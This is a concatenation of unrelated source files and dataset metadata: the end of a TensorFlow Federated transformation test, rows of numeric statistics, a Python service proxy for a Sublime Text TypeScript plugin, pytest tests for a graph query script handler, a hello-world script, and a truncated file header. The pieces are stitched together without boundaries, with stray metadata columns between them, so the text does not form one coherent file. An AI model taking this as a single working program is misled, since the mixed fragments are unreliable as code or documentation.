        tf.int32, placements.CLIENTS, all_equal=True)
    normalized = mapreduce_transformations.normalize_all_equal_bit(
        building_blocks.Reference('x', all_equal_clients))
    self.assertEqual(
        normalized.type_signature,
        computation_types.FederatedType(
            tf.int32, placements.CLIENTS, all_equal=False))
    self.assertIsInstance(normalized, building_blocks.Reference)
    self.assertEqual(str(normalized), 'x')

  def test_converts_not_all_equal_at_server_reference_to_equal(self):
    not_all_equal_server = computation_types.FederatedType(
        tf.int32, placements.SERVER, all_equal=False)
    normalized = mapreduce_transformations.normalize_all_equal_bit(
        building_blocks.Reference('x', not_all_equal_server))
    self.assertEqual(
        normalized.type_signature,
        computation_types.FederatedType(
            tf.int32, placements.SERVER, all_equal=True))
    self.assertIsInstance(normalized, building_blocks.Reference)
    self.assertEqual(str(normalized), 'x')

  def test_converts_all_equal_at_clients_lambda_parameter_to_not_equal(self):
    all_equal_clients = computation_types.FederatedType(
        tf.int32, placements.CLIENTS, all_equal=True)
    default_clients = computation_types.FederatedType(
        tf.int32, placements.CLIENTS)
    lam = building_blocks.Lambda(
        'x', all_equal_clients,
        building_blocks.Reference('x', all_equal_clients))
    normalized_lambda = mapreduce_transformations.normalize_all_equal_bit(lam)
    # The input lambda is left untouched; only the output is normalized.
    self.assertEqual(
        lam.type_signature,
        computation_types.FunctionType(all_equal_clients, all_equal_clients))
    self.assertIsInstance(normalized_lambda, building_blocks.Lambda)
    self.assertEqual(str(normalized_lambda), '(x -> x)')
    self.assertEqual(
        normalized_lambda.type_signature,
        computation_types.FunctionType(default_clients, default_clients))

  def test_converts_not_all_equal_at_server_lambda_parameter_to_equal(self):
    not_all_equal_server = computation_types.FederatedType(
        tf.int32, placements.SERVER, all_equal=False)
    default_server = computation_types.FederatedType(
        tf.int32, placements.SERVER)
    lam = building_blocks.Lambda(
        'x', not_all_equal_server,
        building_blocks.Reference('x', not_all_equal_server))
    normalized_lambda = mapreduce_transformations.normalize_all_equal_bit(lam)
    self.assertEqual(
        lam.type_signature,
        computation_types.FunctionType(not_all_equal_server,
                                       not_all_equal_server))
    self.assertIsInstance(normalized_lambda, building_blocks.Lambda)
    self.assertEqual(str(normalized_lambda), '(x -> x)')
    self.assertEqual(
        normalized_lambda.type_signature,
        computation_types.FunctionType(default_server, default_server))

  def test_converts_federated_map_all_equal_to_federated_map(self):
    all_equal_clients = computation_types.FederatedType(
        tf.int32, placements.CLIENTS, all_equal=True)
    default_clients = computation_types.FederatedType(
        tf.int32, placements.CLIENTS)
    int_identity = building_blocks.Lambda(
        'x', tf.int32, building_blocks.Reference('x', tf.int32))
    federated_arg = building_blocks.Reference('y', all_equal_clients)
    all_equal_map = (
        computation_constructing_utils.create_federated_map_all_equal(
            int_identity, federated_arg))
    normalized_map = mapreduce_transformations.normalize_all_equal_bit(
        all_equal_map)
    self.assertEqual(all_equal_map.function.uri,
                     intrinsic_defs.FEDERATED_MAP_ALL_EQUAL.uri)
    self.assertIsInstance(normalized_map, building_blocks.Call)
    self.assertIsInstance(normalized_map.function, building_blocks.Intrinsic)
    self.assertEqual(normalized_map.function.uri,
                     intrinsic_defs.FEDERATED_MAP.uri)
    self.assertEqual(normalized_map.type_signature, default_clients)
if __name__ == '__main__':
  # Tests rely on TF 2.x (eager) behavior; enable it before absltest runs.
  tf.enable_v2_behavior()
  absltest.main()
| 49.59434
| 178
| 0.739721
| 4,287
| 36,799
| 5.952181
| 0.074644
| 0.079555
| 0.052279
| 0.043265
| 0.850335
| 0.817964
| 0.785163
| 0.748717
| 0.711722
| 0.682996
| 0
| 0.011565
| 0.175249
| 36,799
| 741
| 179
| 49.661269
| 0.829193
| 0.017935
| 0
| 0.642746
| 0
| 0.00156
| 0.028818
| 0.010658
| 0
| 0
| 0
| 0
| 0.184087
| 1
| 0.090484
| false
| 0.00312
| 0.031201
| 0.00312
| 0.138846
| 0.00156
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c3f6c840ec1807a1b263aeece91c1bb57e3be54
| 16,307
|
py
|
Python
|
typescript/libs/service_proxy.py
|
bertilnilsson/TypeScript-Sublime-Plugin
|
268ddfec73ff33394c6cf5bc70ca36a30899fa20
|
[
"Apache-2.0"
] | 1,688
|
2015-04-01T19:48:34.000Z
|
2019-05-06T10:18:55.000Z
|
typescript/libs/service_proxy.py
|
bertilnilsson/TypeScript-Sublime-Plugin
|
268ddfec73ff33394c6cf5bc70ca36a30899fa20
|
[
"Apache-2.0"
] | 584
|
2015-04-01T19:21:43.000Z
|
2019-05-05T23:50:05.000Z
|
typescript/libs/service_proxy.py
|
bertilnilsson/TypeScript-Sublime-Plugin
|
268ddfec73ff33394c6cf5bc70ca36a30899fa20
|
[
"Apache-2.0"
] | 268
|
2015-04-02T19:05:38.000Z
|
2019-04-28T15:08:57.000Z
|
import sublime
from . import json_helpers
from .global_vars import IS_ST2
from .node_client import CommClient
from .text_helpers import Location
class ServiceProxy:
    """Facade over the tsserver communication clients.

    Every public method builds a protocol request dict (carrying a
    monotonically increasing ``seq``), JSON-encodes it, and forwards it to
    the main server client -- and, for a subset of commands, also to the
    worker client when that worker has been started.

    Fixes relative to the original:
      * ``reload_on_worker`` no longer raises ``UnboundLocalError`` when the
        worker is not running (it now returns ``None``).
      * ``request_get_err`` no longer uses a mutable default argument.
      * the repeated build/encode/send boilerplate is factored into private
        helpers; observable behavior (commands, seq consumption, routing)
        is unchanged.
    """

    # NOTE(review): the default CommClient() instances are evaluated once at
    # class-definition time, so every proxy constructed with defaults shares
    # the same two clients.  Kept as-is for backward compatibility.
    def __init__(self, worker_client=CommClient(), server_client=CommClient()):
        self.__comm = server_client
        self.__worker_comm = worker_client
        self.seq = 1  # next request sequence number

    def increase_seq(self):
        """Return the current sequence number and advance the counter."""
        temp = self.seq
        self.seq += 1
        return temp

    # ---- internal helpers --------------------------------------------------

    def __request(self, command, args=None):
        """Return ``(request_dict, json_string)`` for *command*.

        Consumes one sequence number, exactly like every original method did.
        """
        req_dict = self.create_req_dict(command, args)
        return req_dict, json_helpers.encode(req_dict)

    @staticmethod
    def __location_args(path, location, **extra):
        """Standard file/line/offset argument dict, plus any extras."""
        args = {"file": path, "line": location.line, "offset": location.offset}
        args.update(extra)
        return args

    def __post(self, command, args=None):
        """Fire-and-forget *command* to the main server only."""
        _, json_str = self.__request(command, args)
        self.__comm.postCmd(json_str)

    def __post_to_both(self, command, args=None):
        """Fire-and-forget *command* to the server and a running worker."""
        _, json_str = self.__request(command, args)
        self.__comm.postCmd(json_str)
        if self.__worker_comm.started():
            self.__worker_comm.postCmd(json_str)

    def __post_to_worker(self, command, args=None):
        """Fire-and-forget *command* to the worker only (if running)."""
        _, json_str = self.__request(command, args)
        if self.__worker_comm.started():
            self.__worker_comm.postCmd(json_str)

    def __sync(self, command, args=None):
        """Send *command* to the server and block for its response dict."""
        req_dict, json_str = self.__request(command, args)
        return self.__comm.sendCmdSync(json_str, req_dict["seq"])

    def __sync_to_both(self, command, args=None):
        """Like ``__sync`` but also mirrors the command to a running worker.

        Returns the main server's response; the worker's is discarded.
        """
        req_dict, json_str = self.__request(command, args)
        response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
        if self.__worker_comm.started():
            self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
        return response_dict

    def __async(self, command, args, on_completed):
        """Send *command* to the server asynchronously."""
        req_dict, json_str = self.__request(command, args)
        self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])

    # ---- lifecycle / configuration -------------------------------------------

    def exit(self):
        self.__post_to_both("exit")

    def stop_worker(self):
        self.__post_to_worker("exit")

    def configure(self, host_info="Sublime Text", file=None, format_options=None):
        args = {"hostInfo": host_info, "formatOptions": format_options, "file": file}
        self.__post_to_both("configure", args)
        self.set_inferred_project_compiler_options()

    def set_inferred_project_compiler_options(self):
        """Add full type support for compilers running in file scope mode."""
        compiler_options = {
            "target": "ESNext",  # enable all es-next features
            "allowJs": True,     # enable javascript support
            "jsx": "Preserve",   # enable jsx support
            "noEmit": True       # do not emit outputs
        }
        self.__post_to_both("compilerOptionsForInferredProjects",
                            {"options": compiler_options})

    # ---- buffer synchronization -----------------------------------------------

    def change(self, path, begin_location=Location(1, 1), end_location=Location(1, 1), insertString=""):
        args = {
            "file": path,
            "line": begin_location.line,
            "offset": begin_location.offset,
            "endLine": end_location.line,
            "endOffset": end_location.offset,
            "insertString": insertString
        }
        self.__post_to_both("change", args)

    def open(self, path):
        self.__post_to_both("open", {"file": path})

    def open_on_worker(self, path):
        self.__post_to_worker("open", {"file": path})

    def close(self, path):
        self.__post_to_both("close", {"file": path})

    def save_to(self, path, alternatePath):
        self.__post("saveto", {"file": path, "tmpfile": alternatePath})

    def reload(self, path, alternate_path):
        return self.__sync_to_both("reload",
                                   {"file": path, "tmpfile": alternate_path})

    def reload_on_worker(self, path, alternate_path):
        """Synchronously reload on the worker.

        Returns the worker's response, or None when the worker is not
        running.  (The original raised UnboundLocalError in that case.)
        """
        req_dict, json_str = self.__request(
            "reload", {"file": path, "tmpfile": alternate_path})
        response_dict = None
        if self.__worker_comm.started():
            response_dict = self.__worker_comm.sendCmdSync(
                json_str, req_dict["seq"])
        return response_dict

    def reload_async(self, path, alternate_path, on_completed):
        req_dict, json_str = self.__request(
            "reload", {"file": path, "tmpfile": alternate_path})
        self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
        if self.__worker_comm.started():
            self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"])

    def reload_async_on_worker(self, path, alternate_path, on_completed):
        # NOTE(review): on_completed is accepted but never used (the worker
        # reload is fire-and-forget); kept for interface compatibility.
        req_dict, json_str = self.__request(
            "reload", {"file": path, "tmpfile": alternate_path})
        if self.__worker_comm.started():
            self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"])

    # ---- language queries ------------------------------------------------------

    def completions(self, path, location=Location(1, 1), prefix="", on_completed=None):
        req_dict, json_str = self.__request(
            "completions", self.__location_args(path, location, prefix=prefix))
        self.__comm.sendCmd(
            json_str,
            lambda response_dict: None if on_completed is None else on_completed(response_dict),
            req_dict["seq"]
        )

    def async_completions(self, path, location=Location(1, 1), prefix="", on_completed=None):
        self.__async("completions",
                     self.__location_args(path, location, prefix=prefix),
                     on_completed)

    def signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None):
        req_dict, json_str = self.__request(
            "signatureHelp", self.__location_args(path, location, prefix=prefix))
        self.__comm.sendCmd(
            json_str,
            lambda response_dict: None if on_completed is None else on_completed(response_dict),
            req_dict["seq"]
        )

    def async_signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None):
        self.__async("signatureHelp",
                     self.__location_args(path, location, prefix=prefix),
                     on_completed)

    def definition(self, path, location=Location(1, 1)):
        return self.__sync("definition", self.__location_args(path, location))

    def type_definition(self, path, location=Location(1, 1)):
        return self.__sync("typeDefinition",
                           self.__location_args(path, location))

    def references(self, path, location=Location(1, 1)):
        return self.__sync("references", self.__location_args(path, location))

    def rename(self, path, location=Location(1, 1)):
        return self.__sync_to_both("rename",
                                   self.__location_args(path, location))

    def type(self, path, location=Location(1, 1)):
        return self.__sync("type", self.__location_args(path, location))

    def __quick_info_impl(self, command, path, location, on_completed):
        """Shared body of quick_info / quick_info_full."""
        req_dict, json_str = self.__request(
            command, self.__location_args(path, location))
        # NOTE(review): the fallback lambda takes no arguments; if the comm
        # layer invokes it with a response it will raise TypeError.  Kept as
        # in the original -- confirm against CommClient's callback contract.
        callback = on_completed or (lambda: None)
        if not IS_ST2:
            self.__comm.sendCmdAsync(json_str, callback, req_dict["seq"])
        else:
            self.__comm.sendCmd(json_str, callback, req_dict["seq"])

    def quick_info(self, path, location=Location(1, 1), on_completed=None):
        self.__quick_info_impl("quickinfo", path, location, on_completed)

    def quick_info_full(self, path, location=Location(1, 1), on_completed=None):
        self.__quick_info_impl("quickinfo-full", path, location, on_completed)

    def nav_to(self, search_text, file_name):
        return self.__sync(
            "navto",
            {"searchValue": search_text, "file": file_name,
             "maxResultCount": 20})

    def project_info(self, file_name, need_file_name_list=False):
        return self.__sync(
            "projectInfo",
            {"file": file_name, "needFileNameList": need_file_name_list})

    def async_document_highlights(self, path, location, on_completed=None):
        self.__async(
            "documentHighlights",
            self.__location_args(path, location, filesToSearch=[path]),
            on_completed)

    # ---- formatting / refactoring ---------------------------------------------

    def format(self, path, begin_location=Location(1, 1), end_location=Location(1, 1)):
        args = {
            "file": path,
            "line": begin_location.line,
            "offset": begin_location.offset,
            "endLine": end_location.line,
            "endOffset": end_location.offset
        }
        return self.__sync_to_both("format", args)

    def format_on_key(self, path, location=Location(1, 1), key=""):
        return self.__sync_to_both(
            "formatonkey", self.__location_args(path, location, key=key))

    def organize_imports(self, path):
        args = {
            "scope": {
                "type": "file",
                "args": {
                    "file": path
                }
            },
        }
        return self.__sync_to_both("organizeImports", args)

    def get_applicable_refactors_async(self, path, start_loc, end_loc, on_completed):
        args = {
            "file": path,
            "startLine": start_loc.line,
            "startOffset": start_loc.offset,
            "endLine": end_loc.line,
            "endOffset": end_loc.offset,
        }
        self.__async("getApplicableRefactors", args, on_completed)

    def get_edits_for_refactor_async(self, path, refactor_name, action_name, start_loc, end_loc, on_completed):
        args = {
            "file": path,
            "startLine": start_loc.line,
            "startOffset": start_loc.offset,
            "endLine": end_loc.line,
            "endOffset": end_loc.offset,
            "refactor": refactor_name,
            "action": action_name,
        }
        self.__async("getEditsForRefactor", args, on_completed)

    # ---- diagnostics ------------------------------------------------------------

    def request_get_err(self, delay=0, pathList=None):
        # None (not []) as default avoids the shared mutable-default pitfall.
        args = {"files": [] if pathList is None else pathList, "delay": delay}
        self.__post("geterr", args)

    def request_get_err_for_project(self, delay=0, path=""):
        self.__post_to_worker("geterrForProject", {"file": path, "delay": delay})

    def get_semantic_errors(self, path):
        return self.__sync("semanticDiagnosticsSync", {"file": path})

    def get_syntactic_errors(self, path):
        return self.__sync("syntacticDiagnosticsSync", {"file": path})

    def get_code_fixes(self, path, startLine, startOffset, endLine, endOffset, errorCodes):
        args = {
            "file": path,
            "startLine": startLine,
            "startOffset": startOffset,
            "endLine": endLine,
            "endOffset": endOffset,
            "errorCodes": errorCodes
        }
        return self.__sync("getCodeFixes", args)

    # ---- events / plumbing --------------------------------------------------------

    def add_event_handler(self, event_name, cb):
        self.__comm.add_event_handler(event_name, cb)

    def add_event_handler_for_worker(self, event_name, cb):
        self.__worker_comm.add_event_handler(event_name, cb)

    def create_req_dict(self, command_name, args=None):
        """Build the protocol envelope: command, fresh seq, type, optional args."""
        req_dict = {
            "command": command_name,
            "seq": self.increase_seq(),
            "type": "request"
        }
        if args:
            req_dict["arguments"] = args
        return req_dict
| 42.136951
| 111
| 0.633777
| 1,989
| 16,307
| 4.84917
| 0.087984
| 0.108139
| 0.059305
| 0.065215
| 0.785277
| 0.773665
| 0.743183
| 0.737792
| 0.714049
| 0.70534
| 0
| 0.003355
| 0.25069
| 16,307
| 386
| 112
| 42.246114
| 0.785907
| 0.008524
| 0
| 0.590504
| 0
| 0
| 0.075637
| 0.006401
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.020772
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
92c9d604eb7a4fc14dbdbc27a9565417808a696f
| 11,949
|
py
|
Python
|
test/test_script_handler.py
|
evgenyim/bsse-spring-2020-graph-BD
|
73e98918c9a7bebec866fd2c0e4d40dfe45e8c9d
|
[
"MIT"
] | 3
|
2020-02-20T17:34:23.000Z
|
2020-04-03T12:58:44.000Z
|
test/test_script_handler.py
|
evgenyim/bsse-spring-2020-graph-BD
|
73e98918c9a7bebec866fd2c0e4d40dfe45e8c9d
|
[
"MIT"
] | 1
|
2020-05-13T06:52:24.000Z
|
2020-05-13T06:52:24.000Z
|
test/test_script_handler.py
|
evgenyim/bsse-spring-2020-graph-BD
|
73e98918c9a7bebec866fd2c0e4d40dfe45e8c9d
|
[
"MIT"
] | 2
|
2020-02-20T17:38:14.000Z
|
2020-04-24T09:45:26.000Z
|
import tempfile
from src.script_handler import *
from src.cyk import cyk
def run_script(s):
    """Write script text *s* to a temporary file and run the script handler on it.

    Returns whatever ``handle_script_from_file`` returns.
    """
    # The NamedTemporaryFile object must stay alive (local variable) until
    # handle_script_from_file has read it; it is deleted on garbage collection.
    temp = tempfile.NamedTemporaryFile()
    # 'with' guarantees the write handle is flushed and closed even if
    # f.write raises (the original leaked the handle on error).
    with open(temp.name, 'w') as f:
        f.write(s)
    return handle_script_from_file(temp.name)
def test_list_all_graphs(capsys):
    """'list all graphs' output must match the stored expected file."""
    path = os.path.dirname(__file__) + '/resources'
    script = 'connect to [{}];\n' \
             'list all graphs;'.format(path + '/test_dir')
    run_script(script)
    expected = open(path + '/script_out.txt').read()
    assert capsys.readouterr().out == expected
def test_named_pattern(capsys):
    """A named pattern is stored as CNF-style rules via a helper nonterminal."""
    path = os.path.dirname(__file__) + '/resources'
    script = 'connect to [{}];\n' \
             'S = a S b S | ();'.format(path + '/test_dir')
    h = run_script(script)
    expected_rules = {'Q0': [['a', 'S', 'b', 'S'], ['eps']], 'S': [['Q0']]}
    assert h.g.rules == expected_rules
def test_named_pattern2():
    """'a b+ | ()' accepts 'a' followed by one or more 'b', or the empty word."""
    h = run_script('S = a b + | ();')
    for word in ('a b', 'a b b b b', ''):
        assert cyk(h.g, word)
    assert not cyk(h.g, 'a')
def test_named_pattern3():
    """'a ? b' accepts an optional single 'a' followed by exactly one 'b'."""
    h = run_script('S = a ? b;')
    for word in ('a b', 'b'):
        assert cyk(h.g, word)
    for word in ('a', 'a b b', 'a a b'):
        assert not cyk(h.g, word)
def test_named_pattern4():
    """'(a b)* | c' accepts repeated 'a b' pairs (incl. none via *) or one 'c'."""
    h = run_script('S = (a b)* | c;')
    for word in ('a b', 'a b a b', 'c'):
        assert cyk(h.g, word)
    for word in ('a', 'a b b', 'a a b', 'a b c'):
        assert not cyk(h.g, word)
def test_select_exists(capsys):
    """'select exists' prints True when some source vertex matches S."""
    path = os.path.dirname(__file__) + '/resources'
    script = ('connect to [{}];\n'
              'S = a b | a C;'
              'C = S b;'
              'select exists u from [graph.txt] where (u) - S -> (_);').format(path + '/test_dir')
    run_script(script)
    assert capsys.readouterr().out == 'True\n'
def test_select_exists2(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists u from [graph.txt] where (_) - S -> (u);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists3(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists4(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists5(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists6(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 0);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'False\n'
def test_select_exists7(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S| ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists8(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S| ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'False\n'
def test_select_exists9(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S | ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'
'S = a S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'False\nTrue\n'
def test_select_exists10(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'
'connect to [{}];'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == 'False\nTrue\n'
def test_select_count(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count u from [graph.txt] where (u) - S -> (_);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '3\n'
def test_select_count2(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count u from [graph.txt] where (_) - S -> (u);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '2\n'
def test_select_count3(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '6\n'
def test_select_count4(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '2\n'
def test_select_count5(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '1\n'
def test_select_count6(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 0);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '0\n'
def test_select_count7(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S| ();'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S b b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '1\n'
def test_select_count8(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S | ();'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'
'S = a S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '0\n1\n'
def test_select_count9(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select count u from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'
'connect to [{}];'
'select count u from [graph.txt] where (u) - S c c c -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == '0\n3\n'
def test_select(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select u from [graph.txt] where (u) - S -> (_);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[0, 1, 2]\n'
def test_select2(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select u from [graph.txt] where (_) - S -> (u);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[2, 3]\n'
def test_select3(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[(0, 2), (0, 3), (1, 2), (1, 3), (2, 2), (2, 3)]\n'
def test_select4(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[(1, 2), (1, 3)]\n'
def test_select5(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[(1, 3)]\n'
def test_select6(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 0);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[]\n'
def test_select7(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S | ();'
'select (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'
'S = a S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[]\n[(1, 3)]\n'
def test_select8(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select u from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'
'connect to [{}];'
'select u from [graph.txt] where (u) - S c c c -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == '[]\n[0, 1, 2]\n'
def test_select9(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select u from [graph.txt] where (u.ID = 1) - a ? c + -> (v.ID = 3);'
'connect to [{}];'
'select u from [graph.txt] where (u) - a ? c + -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == '[]\n[1, 2, 3]\n'
def test_select10(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C | ();'
'C = S b;'
'select u from [graph.txt] where (u) - S C -> (v.ID = 2);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[0, 1, 2, 3]\n'
| 37.224299
| 145
| 0.508578
| 1,733
| 11,949
| 3.354299
| 0.057703
| 0.012386
| 0.074316
| 0.105281
| 0.883881
| 0.871495
| 0.856528
| 0.847411
| 0.842766
| 0.840702
| 0
| 0.015332
| 0.290401
| 11,949
| 320
| 146
| 37.340625
| 0.670244
| 0
| 0
| 0.566265
| 0
| 0.124498
| 0.386894
| 0
| 0
| 0
| 0
| 0
| 0.188755
| 1
| 0.140562
| false
| 0
| 0.012048
| 0
| 0.156627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1329574ae49892f27259e31f69cf16e3335a7b13
| 81
|
py
|
Python
|
helloworld.py
|
IamBloodHound/HelloWorld
|
f8c1dd2c6415af9f500f81859eb05ef15a6e613d
|
[
"MIT"
] | null | null | null |
helloworld.py
|
IamBloodHound/HelloWorld
|
f8c1dd2c6415af9f500f81859eb05ef15a6e613d
|
[
"MIT"
] | null | null | null |
helloworld.py
|
IamBloodHound/HelloWorld
|
f8c1dd2c6415af9f500f81859eb05ef15a6e613d
|
[
"MIT"
] | null | null | null |
# Minimal demo script: print two greeting lines.
for greeting in ('Hello World', 'I am Blood Hound'):
    print(greeting)
| 27
| 34
| 0.753086
| 13
| 81
| 4.692308
| 0.692308
| 0.327869
| 0.491803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 81
| 3
| 35
| 27
| 0.871429
| 0.395062
| 0
| 0
| 0
| 0
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
132e4cdcfe93c0bdf3530806c27d8b228b9baa4c
| 199
|
py
|
Python
|
prvsnlib/utils/user.py
|
acoomans/prvsn
|
af6b313c2e779ae4e3a9cdba0b1c3a1f4b4c085e
|
[
"BSD-2-Clause"
] | null | null | null |
prvsnlib/utils/user.py
|
acoomans/prvsn
|
